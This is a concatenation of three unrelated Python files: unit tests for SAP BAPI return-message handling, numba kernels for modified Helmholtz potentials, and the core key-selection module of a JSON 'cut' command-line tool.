def test_short_warning(self):
self.assertEqual('Warning: message', self.getBAPIMessage(TYPE='W'))
def test_short_info(self):
self.assertEqual('Info: message', self.getBAPIMessage(TYPE='I'))
def test_short_success(self):
self.assertEqual('Success: message', self.getBAPIMessage(TYPE='S'))
def test_short_abort(self):
self.assertEqual('Abort: message', self.getBAPIMessage(TYPE='A'))
def test_wh_id_and_wh_no(self):
self.assertEqual('Success(SCS|737): message', self.getBAPIMessage(TYPE='S', ID='SCS', NUMBER='737'))
def test_wo_id_and_wh_no(self):
self.assertEqual('Success(|737): message', self.getBAPIMessage(TYPE='S', ID='', NUMBER='737'))
def test_wh_id_and_wo_no(self):
self.assertEqual('Success(SCS|): message', self.getBAPIMessage(TYPE='S', ID='SCS', NUMBER=''))
def test_wh_id_and_wh_no_000(self):
self.assertEqual('Success(SCS|000): message', self.getBAPIMessage(TYPE='S', ID='SCS', NUMBER='000'))
def test_wo_id_and_wh_no_000(self):
self.assertEqual('Success: message', self.getBAPIMessage(TYPE='S', ID='', NUMBER='000'))
class TestBAPIReturn(unittest.TestCase):
def setUp(self):
self.message_e = 'Error message'
self.message_w = 'Warning message'
self.bapirettab = [create_bapiret_error(self.message_e), create_bapiret_warning(self.message_w)]
self.response = Mock()
def test_ctor_value_error(self):
with self.assertRaises(ValueError) as caught:
BAPIReturn("wrong type")
self.assertEqual(str(caught.exception), "Neither dict nor list BAPI return type: str")
def test_is_empty(self):
self.assertTrue(BAPIReturn([]).is_empty)
def test_not_is_empty(self):
self.assertFalse(BAPIReturn(self.bapirettab).is_empty)
def test_is_error_no_error(self):
self.assertFalse(BAPIReturn(self.bapirettab[1]).is_error)
def test_is_error_with_error(self):
self.assertTrue(BAPIReturn(self.bapirettab).is_error)
def test_error_message_no_error(self):
self.assertIsNone(BAPIReturn(self.bapirettab[1]).error_message)
def test_error_message_with_error(self):
self.assertEqual(BAPIReturn(self.bapirettab).error_message, 'Error(ERR|333): Error message')
def test_message_lines(self):
self.assertEqual(BAPIReturn(self.bapirettab).message_lines(), ['Error(ERR|333): Error message', 'Warning(WRN|777): Warning message'])
class TestBAPIError(unittest.TestCase):
def setUp(self):
self.message_e = 'Error message'
self.message_w = 'Warning message'
self.bapirettab = [create_bapiret_error(self.message_e), create_bapiret_warning(self.message_w)]
self.bapiret = BAPIReturn(self.bapirettab)
self.response = Mock()
def assertExDataMatch(self, ex):
self.assertEqual(str(ex), '''Error(ERR|333): Error message
Warning(WRN|777): Warning message''')
self.assertEqual(ex.bapiret._bapirettab, self.bapirettab)
self.assertEqual(ex.response, self.response)
def test_ctor_join_list(self):
ex = BAPIError(self.bapiret, self.response)
self.assertExDataMatch(ex)
def test_raises_for_error(self):
with self.assertRaises(BAPIError) as caught:
BAPIError.raise_for_error(self.bapirettab, self.response)
self.assertExDataMatch(caught.exception)
def test_raises_for_error_with_instance(self):
with self.assertRaises(BAPIError) as caught:
BAPIError.raise_for_error(self.bapirettab[0], self.response)
self.assertEqual(caught.exception.bapiret._bapirettab, self.bapiret[0:1])
def test_does_not_raise(self):
BAPIError.raise_for_error([create_bapiret_warning(self.message_w)], self.response)
def test_contains(self):
ex = BAPIError(self.bapiret, self.response)
self.assertTrue(ex.bapiret.contains('ERR', '333'))
self.assertFalse(ex.bapiret.contains('NOP', '222'))
|
import numpy as np
import numexpr as ne
import numba
from ..misc.numba_special_functions import numba_k0, _numba_k0#, numba_k0_inplace
def generate_modified_helmholtz_functions(k):
@numba.njit("f8(f8,f8,f8,f8)")
def modified_helmholtz_eval(sx, sy, tx, ty):
return _numba_k0(k*np.sqrt((tx-sx)**2 + (ty-sy)**2))
@numba.njit("(f8[:],f8[:],f8[:],f8[:],f8,f8,f8[:],f8[:])",parallel=True)
def modified_helmholtz_kernel(sx, sy, tx, ty, shiftx, shifty, charge, pot):
ns = sx.shape[0]
nt = tx.shape[0]
for i in numba.prange(nt):
for j in range(ns):
dx = tx[i] + shiftx - sx[j]
dy = ty[i] + shifty - sy[j]
d = np.sqrt(dx**2 + dy**2)
pot[i] += charge[j]*_numba_k0(k*d)
@numba.njit("(f8[:],f8[:],f8[:],f8[:])",parallel=True)
def modified_helmholtz_kernel_self(sx, sy, charge, pot):
ns = sx.shape[0]
        for i in numba.prange(ns):
for j in range(ns):
if i != j:
dx = sx[i] - sx[j]
dy = sy[i] - sy[j]
d = np.sqrt(dx**2 + dy**2)
pot[i] += charge[j]*_numba_k0(k*d)
@numba.njit("(f8[:],f8[:],f8[:],f8[:],f8,f8,f8[:],f8[:])")
def modified_helmholtz_kernel_serial(sx, sy, tx, ty, shiftx, shifty, charge, pot):
ns = sx.shape[0]
nt = tx.shape[0]
for i in range(nt):
for j in range(ns):
dx = tx[i] + shiftx - sx[j]
dy = ty[i] + shifty - sy[j]
d = np.sqrt(dx**2 + dy**2)
pot[i] += charge[j]*_numba_k0(k*d)
@numba.njit("(f8[:],f8[:],f8[:],f8[:])")
def modified_helmholtz_kernel_self_serial(sx, sy, charge, pot):
ns = sx.shape[0]
        for i in range(ns):
for j in range(ns):
if i != j:
dx = sx[i] - sx[j]
dy = sy[i] - sy[j]
d = np.sqrt(dx**2 + dy**2)
pot[i] += charge[j]*_numba_k0(k*d)
def Modified_Helmholtz_Kernel_Form(sx, sy, tx=None, ty=None, out=None):
kk = k
is_self = tx is None or ty is None
if is_self:
tx = sx
ty = sy
ns = sx.shape[0]
nt = tx.shape[0]
txt = tx[:,None]
tyt = ty[:,None]
if out is None:
out = np.zeros([nt, ns], dtype=float)
out = ne.evaluate('kk*sqrt((txt - sx)**2 + (tyt - sy)**2)')
out = numba_k0(out)
# numba_k0_inplace(out, 0)
if is_self:
np.fill_diagonal(out, 0.0)
return out
return Modified_Helmholtz_Kernel_Form, modified_helmholtz_kernel_serial, modified_helmholtz_kernel_self_serial, modified_helmholtz_eval
|
"""JSON Keys core functions.
JSON Key definition:
An ordered sequence of one or more JSON pointer reference tokens
(Object member key or array index) starting with a root-level
key/index and ending with a reference to some value within the
document.
The last key can optionally be Python slice syntax, where # can
zero, a positive or negative integer:
':', '#:', ':#', '#:#', '::#', '#::#', ':#:#' or '#:#:#'
Keys are joined together by dot characters.
Examples:
name
name.last
names.0.name.last
names.2:5
"""
from copy import deepcopy
from functools import reduce
from operator import getitem
import click
from . import exceptions as exc
from .inspector import inspect_json, count_arrays
from .sequencer import Items
from .tokenizer import SLICE_RE, parse_defaults, parse_keystr
from .treecrawler import find_keys
def get_rootkey(d, *keys):
"""Set the root level of the JSON document.
Purpose:
1. Point to an array of objects within the JSON document so that
get, del and friends will operate on the properties for each
item in the JSON array.
2. Extract a single branch or value from a JSON document.
Args:
d (Mapping or Sequence): JSON encodable data (document.)
*keys (str): JSON Keys (name, index or trailing slice.)
Returns:
The value referenced by *keys.
Raises:
KeyNotFound
IndexError
TypeError
Example:
>>> d = {'results': {'rows': [{}, {}]}}
>>> get_rootkey(d, 'results', 'rows')
[{}, {}]
"""
try:
return select_key(d, *keys)
except KeyError as e:
raise exc.KeyNotFound(e, op='rootkey', data=d, keylist=[keys])
except IndexError as e:
raise exc.IndexOutOfRange(e, op='rootkey', data=d, keylist=[keys])
except TypeError as e:
raise exc.KeyTypeError(e, op='rootkey', data=d, keylist=[keys])
def list_keys(d, fullscan=False, fg_nums='yellow'):
"""Generate numbered, sorted list of keys found in JSON document.
Purpose:
1. Show available JSON keys.
2. Show key #'s for JSON Keys; used as a shorthand for names.
Using key numbers makes JSON Cut feel more like the way the
*nix cut command works for tabular data.
List crawls through keys looking for new key names. It does not
crawl through Sequences (JSON arrays); with the exception of an
array located at the root-level of the document.
Args:
d (Mapping or Sequence): JSON encodable data (document)
fullscan (bool): traverse all keys looking for new ones;
default is to skip over previously visited key pointers.
fg_nums (str): a 'click' supported foreground color name used
to highlight the numbers and create a visual separation
between numbers and values (the values will be white.)
Supported color names: red, green, yellow, blue, magenta,
cyan, white.
Returns:
List[str]: sorted, numbered list of JSON keys found in document.
See also:
treecrawler module
Examples:
>>> d = [{'k1': {'k2': []}, 'k3': None}, {'k1': {'k4': []}}]
>>> for key in list_keys(d):
... click.echo(key, color=None)
1 k1
2 k1.k2
3 k3
    Note: In the above example fullscan=False, so 'k1.k4' does not
    show up; the key selector 'k1' has already been visited when the
    2nd item in the array is evaluated, so its child nodes are not
    crawled again.
>>> for key in list_keys(d, fullscan=True):
... click.echo(key, color=None)
1 k1
2 k1.k2
3 k1.k4
4 k3
Note: When fullscan=True the function will crawl through all
JSON objects looking for any new keys; even if the same full key
    selector name has been previously visited.
>>> d = {'k1': {'k2': [{'k3': None}]}, 'k4': 5}
>>> for key in list_keys(d, fullscan=True):
... click.echo(key, color=None)
1 k1
2 k1.k2
3 k4
    The reason is that the --list option enumerates items so that
    they can be used as a quick way of specifying JSON selectors
    from the command-line; supporting enumerated keys nested inside
    of nested indexes adds unnecessary complexity, and so far there
    have not been any real-world use cases to justify such a
    feature.
    Note: You can still crawl through nested keys in nested indexes
    and view them using --inspect, and you can access them
    explicitly using key names & indexes; you just can't treat the
    results as numbered shortcuts, as you do with --list, when
    specifying key paths on the command-line.
"""
keys = find_keys(d, fullscan)
padding = len(str(len(keys)))
numbers = (str(i).rjust(padding) for i in range(1, len(keys) + 1))
numbers = (click.style(i, fg=fg_nums) for i in numbers)
return (n + ' ' + i for n, i in zip(numbers, keys))
def get_item(d, key):
"""Try to get item using the key, if fails try as an index or slice.
Args:
d (Mapping or Sequence): JSON encodable data (document)
key (str): JSON Keys.
Returns:
The key's value retrieved from the provided data (document)
Raises:
KeyError
IndexError
TypeError
Examples:
>>> get_item({'0': 'a key'}, '0')
'a key'
>>> get_item(['an index'], '0')
'an index'
"""
try:
return getitem(d, key)
except TypeError:
if key.isdigit():
return getitem(d, int(key))
if SLICE_RE.match(key):
if ':' not in key:
return d[int(key)]
return d[slice(*(int(i) if i else None for i in key.split(':')))]
raise
def select_key(d, *keys, default=None, no_default=False):
"""Get a nested value in a Mapping given the list of keys.
Args:
d (Mapping or Sequence): JSON encodable data (document)
*keys (str): JSON Keys (name, index or trailing slice)
default: Default value if key or index is not found.
no_default (bool): If True, raise KeyNotFound when the key is
not found or the index is out of range otherwise it uses
the 'default' value.
Returns:
The value in the document pointed to by the JSON keys.
Raises:
KeyNotFound: Only returned if no_default option is set.
KeyTypeError: When trying to use a key on a Sequence
or an index on a Mapping.
IndexOutOfRange: When trying to use an index number that
greater than the length of the Sequence.
Examples:
>>> d = {'k1': {'k2': 'Found Key/Value'}}
>>> select_key(d, 'k1', 'k2')
'Found Key/Value'
        >>> print(select_key(d, 'k1', 'missing key'))
None
If no_default is True it will raise a KeyNotFound error.
>>> select_key(d, 'k1', 'missing key', default='Default Value')
'Default Value'
>>> d = {'k1': [{'k2': 'Found Index/Value'}]}
>>> select_key(d, 'k1', '0', 'k2')
        'Found Index/Value'
"""
try:
return reduce(get_item, keys, d)
except KeyError as e:
if no_default:
raise exc.KeyNotFound(e)
return default
except IndexError as e:
raise exc.IndexOutOfRange(e)
except TypeError as e:
raise exc.KeyTypeError(e)
def into_key(*keys, fullpath=False):
"""Generate target key name for the data.
Args:
*keys (str): JSON Keys (name, index or trailing slice)
fullpath (bool): Use the full JSON Key path for the target name.
Returns:
str: Key name to store the data in.
Examples:
        >>> into_key('k1', 'k2')
        'k2'
        >>> into_key('k1', 'k2', fullpath=True)
'k1.k2'
"""
return '.'.join(keys) if fullpath else keys[-1]
def get_items(d, *keylists, fullpath=False, any=True, n=0):
"""Get multiple nested items from a dict given the keys.
Args:
d (Mapping or Sequence): JSON encodable data (document)
*keylists List[str]: JSON Keys (name, index or trailing slice)
fullpath (bool): Use the full JSON Key path in the target name.
any (bool): If True get any instance of the JSON Key value that
exists; otherwise raise KeyNotFound if the key is missing.
n (int): Data item number being processed; shown to user in
exception handling.
Returns:
dict: All Key/Values in data referenced by JSON Keys
Raises:
KeyNotFound: Only returned if 'any' option is not set.
KeyTypeError: When trying to use a key on a Sequence
or an index on a Mapping.
IndexOutOfRange: Only returned if 'any' option is not set.
Examples:
>>> d = {'k1': {'k2': 'item1'}, 'k3': 'item2'}
>>> get_items(d, ['k1', 'k2'], ['k3'])
{'k2': 'item1', 'k3': 'item2'}
>>> get_items(d, ['k1', 'k2'], ['k3'], fullpath=True)
{'k1.k2': 'item1', 'k3': 'item2'}
"""
result = {}
for keylist in keylists:
try:
into = into_key(*keylist, fullpath=fullpath)
result[into] = select_key(d, *keylist, no_default=True)
except exc.KeyNotFound as e:
if not any:
kwds = dict(op='get', itemnum=n, data=d, keylist=keylists)
raise exc.KeyNotFound(e, **kwds)
except exc.IndexOutOfRange as e:
kwds = dict(op='get', itemnum=n, data=d, keylist=keylists)
raise exc.IndexOutOfRange(e, **kwds)
except exc.KeyTypeError as e:
kwds = dict(op='get', itemnum=n, data=d, keylist=keylists)
raise exc.KeyTypeError(e, **kwds)
return result
def get_defaults(d, *defaults, fullpath=False, n=0):
"""Get nested items from keys, set default value if key not found.
Args:
d (Mapping or Sequence): JSON encodable data (document)
*defaults (List[Tuple(List[str], str)]):
(List[str]) - JSON Keys (name, index or trailing slice)
(str) - A string evaluated as a Python literal (see
Default Values)
Python JSON
====== ======
dict object
list array
str string
int number
float number
True true
False false
None null
fullpath (bool): Use the full JSON Key path in the target name.
n (int): Data item number being processed; shown to user in
exception handling.
Returns:
dict: All Key/Values in data referenced by JSON Keys or default
values when key is not found.
Raises:
KeyTypeError: When trying to use a key on a Sequence
or an index on a Mapping.
Examples:
>>> d = {'k1': {'k2': 'item1'}}
>>> defaults = [(['k1', 'k2'], None), (['k3'], False)]
>>> get_defaults(d, *defaults)
{'k2': 'item1', 'k3': False}
>>> get_defaults(d, *defaults, fullpath=True)
{'k1.k2': 'item1', 'k3': False}
"""
try:
        return {into_key(*k, fullpath=fullpath): select_key(d, *k, default=v)
for k, v in defaults}
except exc.KeyTypeError as e:
kwds = dict(op='getdefaults', data=d, keylists=defaults)
raise exc.KeyTypeError(e, **kwds)
def drop_key(d, *keys, no_key_error=True):
"""Delete nested item from Mapping or Sequence given list of keys.
Args:
d (Mapping or Sequence): JSON encodable data (document)
        *keys (str): JSON Keys (name, index or trailing slice)
no_key_error (bool): If True, ignore Key Errors.
Raises:
KeyError
IndexError
TypeError
Examples:
>>> d = {'k1': {'k2': 'Deleted!'}}
>>> drop_key(d, 'k1', 'k2')
>>> d
{'k1': {}}
>>> d = {'k1': [{'k2': 'Deleted!'}]}
>>> drop_key(d, 'k1', 0)
>>> d
{'k1': []}
        >>> d = ['As an index']
        >>> drop_key(d, '0')
        >>> d
        []
"""
parent = d if len(keys) == 1 else select_key(d, *keys[:-1])
try:
del parent[keys[-1]]
except (KeyError, IndexError):
if not no_key_error:
raise
except TypeError:
key = keys[-1]
if key.isdigit():
del parent[int(key)]
elif SLICE_RE.match(key):
            del parent[slice(*(int(i) if i else None for i in key.split(':')))]
else:
raise
def del_items(d, *keylists, any=False, n=0):
"""Delete multiple nested items from a dict using lists of keys.
Args:
d (Mapping or Sequence): JSON encodable data (document)
*keylists List[str]: JSON Keys (name, index or trailing slice)
any (bool): If True delete any instance of the JSON Key value
that exists; if False, raise KeyNotFound error if the key
is missing.
n (int): Data item number being processed; shown to user in
exception handling.
Raises:
KeyNotFound: Only returned if 'any' option is not set.
KeyTypeError: When trying to use a key on a Sequence
or an index on a Mapping.
IndexOutOfRange: Only returned if 'any' option is not set.
Examples:
>>> d = {'k1': {'k2': 'item1'}, 'k3': 'item2'}
>>> del_items(d, ['k1', 'k2'], ['k3'])
>>> d
{'k1': {}}
"""
for keylist in keylists:
try:
drop_key(d, *keylist, no_key_error=any)
except KeyError as e:
if not any:
kwds = dict(op='del', itemnum=n, data=d, keylist=keylist)
raise exc.KeyNotFound(e, **kwds)
except IndexError as e:
kwds = dict(op='del', itemnum=n, data=d, keylists=keylists)
raise exc.IndexOutOfRange(e, **kwds)
except TypeError as e:
kwds = dict(op='del', itemnum=n, data=d, keylists=keylists)
raise exc.KeyTypeError(e, **kwds)
def cut(data, rootkey=None, getkeys=None, getdefaults=None, delkeys=None,
any=False, listkeys=False, inspect=False, count=False, fullpath=False,
fullscan=False, quotechar='"', slice_=False):
"""Translate the given user data & parameters into actions.
This function is effectively the hub/core of JSON cut.
Args:
data (obj): a JSON encodable object.
rootkey (str): set the root of the object (JSON Key)
getkeys (str): select properties (JSON Keys)
        getany (str): select properties (JSON Keys); ignore if key not
found.
getdefaults (List[Tuple(List[str], str)]):
select properties Tuple(List[JSON Key], Default-Value]);
use the default value if the key isn't found. Default values
are strings that are evaluated as Python literals.
delkeys (str): drop properties (JSON Keys)
any (bool): If True get/dele any instance of the JSON Key value
that exists; if False, raise KeyNotFound error if the key
or index does not exist.
listkeys (bool): enumerated, sorted list all unique JSON Keys.
inspect (bool): sorted list of all unique JSON Keys.
        count (bool): report array counts for the document (via count_arrays).
flatten (str): flatten specified key numbers (output of --list)
rows (str): generate flattened row data from specified root key
number (output of --list), optionally prepend each row with
specified comma-separated key numbers as second argument
fullpath (bool): used with get*; include the full key name path.
fullscan (bool): don't skip previously visited JSON Keys.
quotechar (str): the quote character used around JSON Keys.
slice (bool): when the document root is an array don't iterate
"""
if rootkey:
keylist = parse_keystr(rootkey, data, quotechar, None, fullscan)
data = get_rootkey(data, *keylist[0])
if getkeys or getdefaults or delkeys:
data = Items([data] if slice_ else data)
items = deepcopy(data.items) if getkeys and getdefaults else data.items
keys = find_keys(data.value, fullscan)
full, qchar = fullpath, quotechar
if getkeys:
keylists = parse_keystr(getkeys, data.items, quotechar, keys)
data.items = [get_items(d, *keylists, fullpath=full, any=any, n=n)
for n, d in enumerate(data.items, 1)]
if getdefaults:
defaults = getdefaults
        kwds = dict(data=data, quotechar=qchar, keys=keys, fullscan=fullscan)
defaults = [parse_defaults(i[0], j, **kwds) for i, j in defaults]
for n, item in enumerate(items, 1):
results = get_defaults(item, *defaults, fullpath=full, n=n)
data.items[n - 1].update(results)
if delkeys:
keylists = parse_keystr(delkeys, data.items, quotechar, keys)
for item_num, item in enumerate(data.items):
del_items(item, *keylists, any=any, n=item_num)
data = data.value
if inspect:
return inspect_json(data)
elif listkeys:
return list_keys(data, fullscan)
elif count:
return count_arrays(data)
else:
return data
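# Hedged usage sketch (not part of the original module). It assumes parse_keystr
# accepts dot-separated keys and comma-separated key lists, which is how the
# command-line front end is expected to hand them in; treat the exact key-string
# syntax as an assumption rather than a documented contract.
#
#   data = {'results': {'rows': [{'id': 1, 'name': 'a'}, {'id': 2}]}}
#   cut(data, rootkey='results.rows', getkeys='id,name', any=True)
#   # expected result shape: [{'id': 1, 'name': 'a'}, {'id': 2}]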
def listkeys(d):
return find_keys(d, fullscan=True)
def keynums(d):
return dict(enumerate(listkeys(d), 1))
def inspectkeys(d):
print('\n'.join(inspect_json(d, nocolor=True, array_char='*')))
def arraycounts(d):
print(count_arrays(d))
|